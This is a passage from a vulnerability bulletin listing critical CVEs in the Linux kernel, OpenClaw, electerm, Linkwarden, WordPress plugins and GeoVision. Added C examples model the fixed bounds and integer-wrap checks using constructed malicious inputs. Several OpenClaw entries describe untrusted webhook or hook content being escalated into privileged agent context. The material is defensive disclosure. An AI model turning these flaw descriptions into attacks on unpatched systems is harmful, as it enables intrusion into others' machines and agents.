| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: do not pass flow_id to set_rps_cpu() Blamed commit made the assumption that the RPS table for each receive queue would have the same size, and that it would not change. Compute flow_id in set_rps_cpu(), do not assume we can use the value computed by get_rps_cpu(). Otherwise we risk out-of-bound access and/or crashes. | 2026-05-06 | 9.8 | CVE-2026-43208 | https://git.kernel.org/stable/c/5455a232edea6b946b99449f15ca771a8874a5a6 https://git.kernel.org/stable/c/ed712dc0d64dee5f0d05e4d8ca57711f8a9c850c https://git.kernel.org/stable/c/8a8a9fac9efa6423fd74938b940cb7d731780718 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: define and enforce CEPH_MAX_KEY_LEN When decoding the key, verify that the key material would fit into a fixed-size buffer in process_auth_done() and generally has a sane length. The new CEPH_MAX_KEY_LEN check replaces the existing check for a key with no key material which is a) not universal since CEPH_CRYPTO_NONE has to be excluded and b) doesn't provide much value since a smaller than needed key is just as invalid as no key -- this has to be handled elsewhere anyway. | 2026-05-08 | 9.8 | CVE-2026-43304 | https://git.kernel.org/stable/c/6405e8c680974bb74e2c98d5249fb52c7b12a6c6 https://git.kernel.org/stable/c/8d745d38c88ecbed95f6b2b39857bf89f35a3244 https://git.kernel.org/stable/c/e1dc45d97975f9db65694d234fbddf1915176e16 https://git.kernel.org/stable/c/1b275bd49e58752efb83767a5d1aed41356c5e64 https://git.kernel.org/stable/c/c1a0f5f1e5e7e98c36a362ec3d1fcfd9932931ed https://git.kernel.org/stable/c/d82467c07b03a27c3c5469b62bb3b726305a80bb https://git.kernel.org/stable/c/ac431d597a9bdfc2ba6b314813f29a6ef2b4a3bf |
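The dlm entry (CVE-2026-43125) and the libceph entry above are the same shape of defect: a length read from a peer's message drives a copy into a fixed-size buffer without being bounded by that buffer. The following is an added example, not kernel code, that decodes a length-prefixed field with the two checks such a copy needs, and contrasts the old and new libceph key-length predicates as the entry describes them. DLM_RESNAME_MAXLEN is the constant named in the dlm entry; the CEPH_MAX_KEY_LEN value, the cipher-type constants and the 16-bit big-endian wire layout are assumptions made here, and the messages are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Added example (not kernel code). Limits: DLM_RESNAME_MAXLEN is the dlm
 * constant; CEPH_MAX_KEY_LEN's value is assumed for illustration. */
#define DLM_RESNAME_MAXLEN 64
#define CEPH_MAX_KEY_LEN   128

#define CEPH_CRYPTO_NONE 0
#define CEPH_CRYPTO_AES  1

/* Decode a 16-bit big-endian length followed by that many bytes into dst.
 * Returns the number of bytes copied, or -1 if the message is malformed.
 * The first check is the one the dlm fix adds; the second rejects a length
 * that claims more bytes than were actually received. */
int decode_len_prefixed(const uint8_t *msg, size_t msg_len,
                        uint8_t *dst, size_t dst_cap)
{
    if (msg_len < 2)
        return -1;
    size_t len = ((size_t)msg[0] << 8) | msg[1];
    if (len > dst_cap)            /* would overrun the fixed buffer */
        return -1;
    if (len > msg_len - 2)        /* would read past the received data */
        return -1;
    memcpy(dst, msg + 2, len);
    return (int)len;
}

/* A resource name as the rsb search would consume it: copied into a
 * DLM_RESNAME_MAXLEN buffer only when it fits. */
int dlm_resname_from_msg(const uint8_t *msg, size_t msg_len,
                         uint8_t name[DLM_RESNAME_MAXLEN])
{
    return decode_len_prefixed(msg, msg_len, name, DLM_RESNAME_MAXLEN);
}

/* The libceph check before the fix, as the entry describes it: only "no key
 * material" was rejected, and only for ciphers other than NONE. */
int ceph_key_len_ok_old(int crypto_type, size_t key_len)
{
    return crypto_type == CEPH_CRYPTO_NONE || key_len != 0;
}

/* After the fix: the length must fit the fixed-size key buffer regardless of
 * cipher. A too-short key is invalid for the same reason a missing one is,
 * and is left to cipher setup to reject. */
int ceph_key_len_ok_new(size_t key_len)
{
    return key_len <= CEPH_MAX_KEY_LEN;
}

int main(void)
{
    uint8_t name[DLM_RESNAME_MAXLEN];
    /* constructed: a 5-byte name, and a header claiming 200 bytes */
    const uint8_t ok_msg[]  = { 0x00, 0x05, 'l', 'o', 'c', 'k', '1' };
    const uint8_t big_msg[] = { 0x00, 0xc8, 'x', 'x', 'x', 'x' };
    printf("valid name: %d bytes\n", dlm_resname_from_msg(ok_msg, sizeof ok_msg, name));
    printf("oversized name: %d\n", dlm_resname_from_msg(big_msg, sizeof big_msg, name));
    printf("4096-byte AES key, old check: %d, new check: %d\n",
           ceph_key_len_ok_old(CEPH_CRYPTO_AES, 4096), ceph_key_len_ok_new(4096));
    return 0;
}
```

The destination bound and the source bound are independent: a length can be small enough for the buffer yet larger than the bytes received, or vice versa, so a decoder needs both.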
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/ipv6: ioam6: prevent schema length wraparound in trace fill ioam6_fill_trace_data() stores the schema contribution to the trace length in a u8. With bit 22 enabled and the largest schema payload, sclen becomes 1 + 1020 / 4, wraps from 256 to 0, and bypasses the remaining-space check. __ioam6_fill_trace_data() then positions the write cursor without reserving the schema area but still copies the 4-byte schema header and the full schema payload, overrunning the trace buffer. Keep sclen in an unsigned int so the remaining-space check and the write cursor calculation both see the full schema length. | 2026-05-08 | 9.8 | CVE-2026-43341 | https://git.kernel.org/stable/c/e96d48b37708d53cbdc47f6f60b0714fc4a5f596 https://git.kernel.org/stable/c/d1b041080086e91d3733a5438a8c51ad5d3d8e09 https://git.kernel.org/stable/c/77695a69baca9b99d95fad09fc78c2318736604f https://git.kernel.org/stable/c/184d2e9db27c0f76226b5cad16fe29510a5d2280 https://git.kernel.org/stable/c/d6e1c9b02d85a4f1f4ba6d68e916d9b610a3ed7d https://git.kernel.org/stable/c/5e67ba9bb531e1ec6599a82a065dea9040b9ce50 |
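The two ioam6 entries (CVE-2026-43186 above and CVE-2026-43341 here) both concern the IOAM pre-allocated trace header: the receive path must derive the expected NodeLen from the 24-bit trace type instead of trusting the packet's NodeLen, and the schema contribution to the trace length must be kept in an integer wide enough not to wrap. The following is an added example, not kernel code, that models both checks on a simplified header. RFC 9197 bit numbering (bit 0 is the most significant of the 24 bits) and the 4-octet units of NodeLen and RemainingLen are taken from the entries; bit 23 is not counted, matching the 0xff1ffc00 short-field mask quoted above; the struct layout, function names and packet values are constructed.

```c
#include <stdint.h>
#include <stdio.h>

/* Added example (not kernel code): IOAM trace-header validation.
 * All lengths are in 4-octet words, as NodeLen and RemainingLen are on
 * the wire. RFC 9197 numbers trace-type bits from the MSB: bit 0 is the
 * most significant bit of the 24-bit field. */
#define IOAM6_TYPE_BIT(n) (1u << (23 - (n)))

static uint32_t type_bits(int from, int to)
{
    uint32_t m = 0;
    for (int n = from; n <= to; n++)
        m |= IOAM6_TYPE_BIT(n);
    return m;
}

static unsigned popcount32(uint32_t v)
{
    unsigned c = 0;
    for (; v; v &= v - 1)
        c++;
    return c;
}

/* Per-node data items: bits 0-7 and 11-21 are 4 octets (one word), bits
 * 8-10 are 8 octets (two words). Bit 22 is the variable-length opaque
 * state snapshot and is not part of NodeLen; bit 23 is not counted here. */
unsigned ioam6_expected_nodelen(uint32_t type)
{
    uint32_t shorts = type_bits(0, 7) | type_bits(11, 21);
    uint32_t wides  = type_bits(8, 10);
    return popcount32(type & shorts) + 2 * popcount32(type & wides);
}

struct ioam6_trace {
    uint32_t type;     /* 24-bit trace type */
    unsigned nodelen;  /* 5-bit NodeLen field, words */
    unsigned remlen;   /* 7-bit RemainingLen field, words */
};

/* Receive-path check (CVE-2026-43186): accept only if NodeLen matches the
 * type bits. nodelen=0 with bits 0-21 set is the crafted case. */
int ioam6_nodelen_consistent(const struct ioam6_trace *t)
{
    if (t->type >> 24)             /* only 24 bits are defined */
        return 0;
    return t->nodelen == ioam6_expected_nodelen(t->type);
}

/* Schema contribution: one word of header plus the payload, in words. */
static uint8_t schema_words_u8(unsigned schema_len)   /* the width that wraps */
{
    return (uint8_t)(1 + schema_len / 4);
}

static unsigned schema_words(unsigned schema_len)     /* the fix: unsigned int */
{
    return 1 + schema_len / 4;
}

static int fits(const struct ioam6_trace *t, unsigned sclen)
{
    return t->remlen != 0 && t->remlen >= t->nodelen + sclen;
}

/* Remaining-space check before filling (CVE-2026-43341). With a 1020-byte
 * schema the u8 path computes 256 -> 0 and lets the write go ahead. */
int ioam6_fill_fits_vulnerable(const struct ioam6_trace *t, unsigned schema_len)
{
    unsigned sclen = (t->type & IOAM6_TYPE_BIT(22)) ? schema_words_u8(schema_len) : 0;
    return fits(t, sclen);
}

int ioam6_fill_fits_fixed(const struct ioam6_trace *t, unsigned schema_len)
{
    unsigned sclen = (t->type & IOAM6_TYPE_BIT(22)) ? schema_words(schema_len) : 0;
    return fits(t, sclen);
}

int main(void)
{
    struct ioam6_trace crafted  = { type_bits(0, 21), 0, 127 };   /* constructed */
    struct ioam6_trace snapshot = { IOAM6_TYPE_BIT(22), 0, 127 };
    unsigned words = ioam6_expected_nodelen(crafted.type);
    printf("expected NodeLen for bits 0-21: %u words (%u bytes)\n", words, 4 * words);
    printf("crafted packet accepted: %d\n", ioam6_nodelen_consistent(&crafted));
    printf("1020-byte schema fits: u8 sclen=%d, unsigned sclen=%d\n",
           ioam6_fill_fits_vulnerable(&snapshot, 1020),
           ioam6_fill_fits_fixed(&snapshot, 1020));
    return 0;
}
```

The 25-word (100-byte) figure for bits 0-21 is the size of the write the first entry describes going past the buffer when NodeLen is 0; deriving the length from the type on both the send and receive paths removes the packet's say in it.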
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix use-after-free by using call_rcu() for oplock_info ksmbd currently frees oplock_info immediately using kfree(), even though it is accessed under RCU read-side critical sections in places like opinfo_get() and proc_show_files(). Since there is no RCU grace period delay between nullifying the pointer and freeing the memory, a reader can still access the oplock_info structure after it has been freed. This can lead to a use-after-free, especially in opinfo_get() where atomic_inc_not_zero() is called on already freed memory. Fix this by switching to deferred freeing using call_rcu(). | 2026-05-08 | 9.8 | CVE-2026-43376 | https://git.kernel.org/stable/c/302fef75512b2c8329a3f5efab1ae7ba2562387a https://git.kernel.org/stable/c/08aa9f3c8cf4d0bee44df540dfe34e8d64069f2c https://git.kernel.org/stable/c/1d6abf145615dbfe267ce3b0a271f95e3780e18e https://git.kernel.org/stable/c/ce8507ee82c888126d8e7565e27c016308d24cde https://git.kernel.org/stable/c/1dfd062caa165ec9d7ee0823087930f3ab8a6294 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix use-after-free in smb_lazy_parent_lease_break_close() The opinfo pointer obtained via rcu_dereference(fp->f_opinfo) is being accessed after rcu_read_unlock() has been called. This creates a race condition where the memory could be freed by a concurrent writer between the unlock and the subsequent pointer dereferences (opinfo->is_lease, etc.), leading to a use-after-free. | 2026-05-08 | 9.8 | CVE-2026-43379 | https://git.kernel.org/stable/c/bf4d66d72e4a9e268c1012c331ce9eaedb5e2086 https://git.kernel.org/stable/c/960699317d39f46611f4ebeb69edc567c1f4e6b6 https://git.kernel.org/stable/c/dbbd328cf58261ca239756fe1c0d10c9518d3399 https://git.kernel.org/stable/c/b3568347c51c46e2cabc356bc34676df98296619 https://git.kernel.org/stable/c/eac3361e3d5dd8067b3258c69615888eb45e9f25 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/tcp-md5: Fix MAC comparison to be constant-time To prevent timing attacks, MACs need to be compared in constant time. Use the appropriate helper function for this. | 2026-05-08 | 9.4 | CVE-2026-43383 | https://git.kernel.org/stable/c/821c8751fdeecdeecabeb11704dd33439c9e4bbc https://git.kernel.org/stable/c/345a9530756528d7ca407663d659c3c40e75c3dd https://git.kernel.org/stable/c/5d305a95130a8d08b9545e47f1e18d29d59866cb https://git.kernel.org/stable/c/02669e2a4d207068edce7e8b5fafd85822018ce6 https://git.kernel.org/stable/c/ae3831b44f477de048287493e184fc3ff913b624 https://git.kernel.org/stable/c/b502e97e29d791ff7a8051f29a414535739be218 https://git.kernel.org/stable/c/46d0d6f50dab706637f4c18a470aac20a21900d3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/tcp-ao: Fix MAC comparison to be constant-time To prevent timing attacks, MACs need to be compared in constant time. Use the appropriate helper function for this. | 2026-05-08 | 9.8 | CVE-2026-43384 | https://git.kernel.org/stable/c/8be6ed64966da48b6c4726918f106c18742a5125 https://git.kernel.org/stable/c/a269cbdc442f8658bca35383e34b9d0b0ff95a1c https://git.kernel.org/stable/c/080b0e210088296dd50d6637c06c1db14246adfe https://git.kernel.org/stable/c/67edfec516d30d3e62925c397be4a1e5185802fc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kthread: consolidate kthread exit paths to prevent use-after-free Guillaume reported crashes via corrupted RCU callback function pointers during KUnit testing. The crash was traced back to the pidfs rhashtable conversion which replaced the 24-byte rb_node with an 8-byte rhash_head in struct pid, shrinking it from 160 to 144 bytes. struct kthread (without CONFIG_BLK_CGROUP) is also 144 bytes. With CONFIG_SLAB_MERGE_DEFAULT and SLAB_HWCACHE_ALIGN both round up to 192 bytes and share the same slab cache. struct pid.rcu.func and struct kthread.affinity_node both sit at offset 0x78. When a kthread exits via make_task_dead() it bypasses kthread_exit() and misses the affinity_node cleanup. free_kthread_struct() frees the memory while the node is still linked into the global kthread_affinity_list. A subsequent list_del() by another kthread writes through dangling list pointers into the freed and reused memory, corrupting the pid's rcu.func pointer. Instead of patching free_kthread_struct() to handle the missed cleanup, consolidate all kthread exit paths. Turn kthread_exit() into a macro that calls do_exit() and add kthread_do_exit() which is called from do_exit() for any task with PF_KTHREAD set. This guarantees that kthread-specific cleanup always happens regardless of the exit path - make_task_dead(), direct do_exit(), or kthread_exit(). Replace __to_kthread() with a new tsk_is_kthread() accessor in the public header. Export do_exit() since module code using the kthread_exit() macro now needs it directly. | 2026-05-08 | 9.8 | CVE-2026-43402 | https://git.kernel.org/stable/c/4729c7b00a347fd37d0cbc265b85f2884c3e06b6 https://git.kernel.org/stable/c/5a591d7a5e48d30100943940a30a6ab41b15c672 https://git.kernel.org/stable/c/28aaa9c39945b7925a1cc1d513c8f21ed38f5e4f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: prevent potential out-of-bounds reads in process_message_header() If the message frame is (maliciously) corrupted in a way that the length of the control segment ends up being less than the size of the message header or a different frame is made to look like a message frame, out-of-bounds reads may ensue in process_message_header(). Perform an explicit bounds check before decoding the message header. | 2026-05-08 | 9.1 | CVE-2026-43406 | https://git.kernel.org/stable/c/76ccf21a12c5f6d6790bc32c7da82446d877b2f4 https://git.kernel.org/stable/c/75582aaa580c11aed4c7731cad6b068b700e7efb https://git.kernel.org/stable/c/50156622eb0888e62541d715a98584480a1bc7cb https://git.kernel.org/stable/c/dbd857a9e1e33ea71eaf3e211877027e533770d1 https://git.kernel.org/stable/c/69fe5af33fa3806f398d21c081d73c66e5523bc2 https://git.kernel.org/stable/c/035867ae6f18df0aeedb2a57a5b74091bd4e3fe8 https://git.kernel.org/stable/c/69fb5d91bba44ecf7eb80530b85fa4fb028921d5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: Fix potential out-of-bounds access in ceph_handle_auth_reply() This patch fixes an out-of-bounds access in ceph_handle_auth_reply() that can be triggered by a message of type CEPH_MSG_AUTH_REPLY. In ceph_handle_auth_reply(), the value of the payload_len field of such a message is stored in a variable of type int. A value greater than INT_MAX leads to an integer overflow and is interpreted as a negative value. This leads to decrementing the pointer address by this value and subsequently accessing it because ceph_decode_need() only checks that the memory access does not exceed the end address of the allocation. This patch fixes the issue by changing the data type of payload_len to u32. Additionally, the data type of result_msg_len is changed to u32, as it is also a variable holding a non-negative length. Also, an additional layer of sanity checks is introduced, ensuring that directly after reading it from the message, payload_len and result_msg_len are not greater than the overall segment length. BUG: KASAN: slab-out-of-bounds in ceph_handle_auth_reply+0x642/0x7a0 [libceph] Read of size 4 at addr ffff88811404df14 by task kworker/20:1/262 CPU: 20 UID: 0 PID: 262 Comm: kworker/20:1 Not tainted 6.19.2 #5 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 Workqueue: ceph-msgr ceph_con_workfn [libceph] Call Trace: <TASK> dump_stack_lvl+0x76/0xa0 print_report+0xd1/0x620 ? __pfx__raw_spin_lock_irqsave+0x10/0x10 ? kasan_complete_mode_report_info+0x72/0x210 kasan_report+0xe7/0x130 ? ceph_handle_auth_reply+0x642/0x7a0 [libceph] ? ceph_handle_auth_reply+0x642/0x7a0 [libceph] __asan_report_load_n_noabort+0xf/0x20 ceph_handle_auth_reply+0x642/0x7a0 [libceph] mon_dispatch+0x973/0x23d0 [libceph] ? apparmor_socket_recvmsg+0x6b/0xa0 ? __pfx_mon_dispatch+0x10/0x10 [libceph] ? __kasan_check_write+0x14/0x30 ? mutex_unlock+0x7f/0xd0 ? __pfx_mutex_unlock+0x10/0x10 ? __pfx_do_recvmsg+0x10/0x10 [libceph] ceph_con_process_message+0x1f1/0x650 [libceph] process_message+0x1e/0x450 [libceph] ceph_con_v2_try_read+0x2e48/0x6c80 [libceph] ? __pfx_ceph_con_v2_try_read+0x10/0x10 [libceph] ? save_fpregs_to_fpstate+0xb0/0x230 ? raw_spin_rq_unlock+0x17/0xa0 ? finish_task_switch.isra.0+0x13b/0x760 ? __switch_to+0x385/0xda0 ? __kasan_check_write+0x14/0x30 ? mutex_lock+0x8d/0xe0 ? __pfx_mutex_lock+0x10/0x10 ceph_con_workfn+0x248/0x10c0 [libceph] process_one_work+0x629/0xf80 ? __kasan_check_write+0x14/0x30 worker_thread+0x87f/0x1570 ? __pfx__raw_spin_lock_irqsave+0x10/0x10 ? __pfx_try_to_wake_up+0x10/0x10 ? kasan_print_address_stack_frame+0x1f7/0x280 ? __pfx_worker_thread+0x10/0x10 kthread+0x396/0x830 ? __pfx__raw_spin_lock_irq+0x10/0x10 ? __pfx_kthread+0x10/0x10 ? __kasan_check_write+0x14/0x30 ? recalc_sigpending+0x180/0x210 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x3f7/0x610 ? __pfx_ret_from_fork+0x10/0x10 ? __switch_to+0x385/0xda0 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1a/0x30 </TASK> [ idryomov: replace if statements with ceph_decode_need() for payload_len and result_msg_len ] | 2026-05-08 | 9.1 | CVE-2026-43407 | https://git.kernel.org/stable/c/ea080b21092590122c3f971cf588932cdbf47847 https://git.kernel.org/stable/c/edc678e5cd11730a2834b43071d8923f05bc334d https://git.kernel.org/stable/c/6cee34d6669fe176b4259131adb1a145c939b472 https://git.kernel.org/stable/c/8bb87547e92dcf0928ed763c60e0ac8d733c3656 https://git.kernel.org/stable/c/ed024d2f4c79c0eb2464df0fb640610ac301f9a0 https://git.kernel.org/stable/c/f9da5c1bbac5c8e33259fe00ed7347438fffa969 https://git.kernel.org/stable/c/9f9e2297f45fc2d2524eb104c289d69ddef95665 https://git.kernel.org/stable/c/b282c43ed156ae15ea76748fc15cd5c39dc9ab72 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: Completely fix fcport double free In qla24xx_els_dcmd_iocb() sp->free is set to qla2x00_els_dcmd_sp_free(). When an error happens, this function is called by qla2x00_sp_release(), when kref_put() releases the first and the last reference. qla2x00_els_dcmd_sp_free() frees fcport by calling qla2x00_free_fcport(). Doing it one more time after kref_put() is a bad idea. | 2026-05-08 | 9.8 | CVE-2026-43414 | https://git.kernel.org/stable/c/d48ea85463f5b34f7b92ea0a13eddf1ab993da7b https://git.kernel.org/stable/c/c0b7da13a04bd70ef6070bfb9ea85f582294560a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: RX, Fix XDP multi-buf frag counting for striding RQ XDP multi-buf programs can modify the layout of the XDP buffer when the program calls bpf_xdp_pull_data() or bpf_xdp_adjust_tail(). The referenced commit in the fixes tag corrected the assumption in the mlx5 driver that the XDP buffer layout doesn't change during a program execution. However, this fix introduced another issue: the dropped fragments still need to be counted on the driver side to avoid page fragment reference counting issues. The issue was discovered by the drivers/net/xdp.py selftest, more specifically the test_xdp_native_tx_mb: - The mlx5 driver allocates a page_pool page and initializes it with a frag counter of 64 (pp_ref_count=64) and the internal frag counter to 0. - The test sends one packet with no payload. - On RX (mlx5e_skb_from_cqe_mpwrq_nonlinear()), mlx5 configures the XDP buffer with the packet data starting in the first fragment which is the page mentioned above. - The XDP program runs and calls bpf_xdp_pull_data() which moves the header into the linear part of the XDP buffer. As the packet doesn't contain more data, the program drops the tail fragment since it no longer contains any payload (pp_ref_count=63). - mlx5 device skips counting this fragment. Internal frag counter remains 0. - mlx5 releases all 64 fragments of the page but page pp_ref_count is 63 => negative reference counting error. Resulting splat during the test: WARNING: CPU: 0 PID: 188225 at ./include/net/page_pool/helpers.h:297 mlx5e_page_release_fragmented.isra.0+0xbd/0xe0 [mlx5_core] Modules linked in: [...] CPU: 0 UID: 0 PID: 188225 Comm: ip Not tainted 6.18.0-rc7_for_upstream_min_debug_2025_12_08_11_44 #1 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 RIP: 0010:mlx5e_page_release_fragmented.isra.0+0xbd/0xe0 [mlx5_core] [...] Call Trace: <TASK> mlx5e_free_rx_mpwqe+0x20a/0x250 [mlx5_core] mlx5e_dealloc_rx_mpwqe+0x37/0xb0 [mlx5_core] mlx5e_free_rx_descs+0x11a/0x170 [mlx5_core] mlx5e_close_rq+0x78/0xa0 [mlx5_core] mlx5e_close_queues+0x46/0x2a0 [mlx5_core] mlx5e_close_channel+0x24/0x90 [mlx5_core] mlx5e_close_channels+0x5d/0xf0 [mlx5_core] mlx5e_safe_switch_params+0x2ec/0x380 [mlx5_core] mlx5e_change_mtu+0x11d/0x490 [mlx5_core] mlx5e_change_nic_mtu+0x19/0x30 [mlx5_core] netif_set_mtu_ext+0xfc/0x240 do_setlink.isra.0+0x226/0x1100 rtnl_newlink+0x7a9/0xba0 rtnetlink_rcv_msg+0x220/0x3c0 netlink_rcv_skb+0x4b/0xf0 netlink_unicast+0x255/0x380 netlink_sendmsg+0x1f3/0x420 __sock_sendmsg+0x38/0x60 ____sys_sendmsg+0x1e8/0x240 ___sys_sendmsg+0x7c/0xb0 [...] __sys_sendmsg+0x5f/0xb0 do_syscall_64+0x55/0xc70 The problem applies for XDP_PASS as well which is handled in a different code path in the driver. This patch fixes the issue by doing page frag counting on all the original XDP buffer fragments for all relevant XDP actions (XDP_TX, XDP_REDIRECT and XDP_PASS). This is basically reverting to the original counting before the commit in the fixes tag. As frag_page is still pointing to the original tail, the nr_frags parameter to xdp_update_skb_frags_info() needs to be calculated in a different way to reflect the new nr_frags. | 2026-05-08 | 9.8 | CVE-2026-43465 | https://git.kernel.org/stable/c/7d7342a18fadcdb70a63b3c930dc63528ce51832 https://git.kernel.org/stable/c/043bd62f748bc9fd98154037aa598cffbd3c667c https://git.kernel.org/stable/c/db25c42c2e1f9c0d136420fff5e5700f7e771a6f |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains an input validation vulnerability that allows external hook metadata to be enqueued as trusted system events. Attackers can supply malicious hook names to escalate untrusted input into higher-trust agent context. | 2026-05-05 | 9.1 | CVE-2026-43534 | GitHub Security Advisory (GHSA-7g8c-cfr3-vqqr) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - Unsanitized External Input in Agent Hook Events |
| OpenClaw--OpenClaw | OpenClaw versions 2026.4.7 before 2026.4.14 contain a privilege escalation vulnerability where heartbeat owner downgrade logic skips webhook wake events carrying untrusted content. Attackers can exploit this by sending untrusted webhook wake events to preserve owner-like execution context when the run should have been downgraded. | 2026-05-05 | 9.1 | CVE-2026-43566 | GitHub Security Advisory (GHSA-g2hm-779g-vm32) Patch Commit VulnCheck Advisory: OpenClaw 2026.4.7 < 2026.4.14 - Privilege Escalation via Untrusted Webhook Wake Events |
| OpenClaw--OpenClaw | OpenClaw versions 2026.2.21 before 2026.4.10 contain an authentication bypass vulnerability in the sandbox noVNC helper route that exposes interactive browser session credentials. Attackers can access the noVNC helper route without bridge authentication to gain unauthorized access to the interactive browser session. | 2026-05-06 | 9.8 | CVE-2026-43575 | GitHub Security Advisory (GHSA-92jp-89mq-4374) Patch Commit VulnCheck Advisory: OpenClaw 2026.2.21 < 2026.4.10 - Authentication Bypass in Sandbox noVNC Helper Route |
| OpenClaw--OpenClaw | OpenClaw versions 2026.3.31 before 2026.4.10 contain a privilege escalation vulnerability where heartbeat owner downgrade detection misses local background async exec completion events. Attackers can exploit this by providing untrusted completion content to leave a run in a more privileged context than intended. | 2026-05-06 | 9.1 | CVE-2026-43578 | GitHub Security Advisory (GHSA-g375-h3v6-4873) Patch Commit VulnCheck Advisory: OpenClaw 2026.3.31 < 2026.4.10 - Privilege Escalation via Missed Async Exec Completion Events in Heartbeat Owner Downgrade |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains an improper network binding vulnerability in the sandbox browser CDP relay that exposes Chrome DevTools Protocol on 0.0.0.0. Attackers can access the DevTools protocol outside intended local sandbox boundaries by exploiting the overly broad binding configuration. | 2026-05-06 | 9.6 | CVE-2026-43581 | GitHub Security Advisory (GHSA-525j-hqq2-66r4) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - Chrome DevTools Protocol Exposure via Overly Broad CDP Relay Binding |
| electerm--electerm | electerm is an open-source terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. In versions 3.8.15 and prior, Electerm's terminal hyperlink handler passes any URL clicked in the terminal directly to shell.openExternal without any protocol validation. An attacker who controls terminal output (e.g., via a malicious SSH server, compromised remote host, or malicious plugin rendering terminal content) can thus achieve arbitrary code execution or local file access on the victim's machine, requiring only that the victim clicks a displayed link. At time of publication, there are no publicly available patches. | 2026-05-08 | 9.6 | CVE-2026-43941 | https://github.com/electerm/electerm/security/advisories/GHSA-fwf6-j56g-m97c |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.15 contains an authentication bypass vulnerability in Feishu webhook and card-action validation that allows unauthenticated requests to reach command dispatch. Missing encryptKey configuration and blank callback tokens fail open instead of rejecting requests, enabling attackers to bypass signature verification and replay protection to execute arbitrary commands. | 2026-05-06 | 9.8 | CVE-2026-44109 | GitHub Security Advisory (GHSA-xh72-v6v9-mwhc) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.15 - Authentication Bypass in Feishu Webhook and Card-Action Validation |
| linkwarden--linkwarden | Linkwarden is a self-hosted, open-source collaborative bookmark manager to collect, organize and archive webpages. Prior to version 2.13.0, a Server-Side Request Forgery (SSRF) vulnerability in the fetchTitleAndHeaders function allows authenticated users to make arbitrary HTTP requests to internal services due to insufficient URL validation that only checks for "http://" or "https://" prefixes. This issue has been patched in version 2.13.0. | 2026-05-08 | 9.1 | CVE-2026-44313 | https://github.com/linkwarden/linkwarden/security/advisories/GHSA-5qpc-x7rv-hvmp |
| ahmadgb--GeekyBot AI Copilot, Chatbot, WooCommerce Lead Gen & Zero-Prompt Content | The Geeky Bot plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.2.2. This is due to a nopriv AJAX route allowing attacker-controlled model/function dispatch and reaching a plugin installer helper that downloads and unzips attacker-supplied ZIP files into wp-content/plugins/. This makes it possible for unauthenticated attackers to perform arbitrary plugin installation and achieve remote code execution. | 2026-05-05 | 9.8 | CVE-2026-5294 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a1817c58-e807-4ef2-a382-28ca2fd5239e?source=cve https://plugins.trac.wordpress.org/changeset/3497169/geeky-bot |
| MoreConvert--MoreConvert Pro | The MoreConvert Pro plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.9.14. This is due to the guest waitlist verification flow not invalidating or regenerating verification tokens when the customer email address is changed. This makes it possible for unauthenticated attackers to authenticate as existing users, including administrators, by obtaining a valid guest verification token for an attacker-controlled email, changing the same guest customer email to the target account email through the public waitlist flow, and then using the original verification link. | 2026-05-05 | 9.8 | CVE-2026-5722 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fe887475-f7e8-4fda-a793-bc6f37b70f3e?source=cve https://wordpress.org/plugins/smart-wishlist-for-more-convert/ https://moreconvert.com/changelog/ |
| TUBITAK BILGEM Software Technologies Research Institute--Liderahenk | Origin Validation Error vulnerability in TUBITAK BILGEM Software Technologies Research Institute Liderahenk allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Liderahenk: from 2.0.1 before 2.0.2. | 2026-05-07 | 9.8 | CVE-2026-6508 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0181 |
| DivvyDrive Information Technologies Inc.--DivvyDrive | URL redirection to untrusted site ('open redirect') vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Parameter Injection. This issue affects DivvyDrive: from 4.8.2.9 before 4.8.3.2. | 2026-05-07 | 9.6 | CVE-2026-6795 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0182 |
| GeoVision Inc.--GV-IP Device Utility | An insufficient encryption vulnerability exists in the Device Authentication functionality of GeoVision GV-IP Device Utility 9.0.5. Listening to broadcast packets can lead to a credentials leak. An attacker can listen to broadcast messages to trigger this vulnerability. When interacting with various Geovision devices on the network, the utility may send privileged commands; in order to do so, the username and password of the device need to be provided. In some instances the command is broadcast over UDP and the username/password are encrypted using a cryptographic protocol that appears to be derived from Blowfish. However, the symmetric key used for the encryption is also included in the packet, and thus the security of the username/password relies only on the "obscurity" of the encryption scheme. An attacker on the same LAN can listen to the broadcast traffic once an admin user interacts with the device, and decrypt the credentials using their own implementation of the algorithm. With this password the attacker would have full control over the device configuration, allowing them to change its IP address or even reset it to factory default. | 2026-05-04 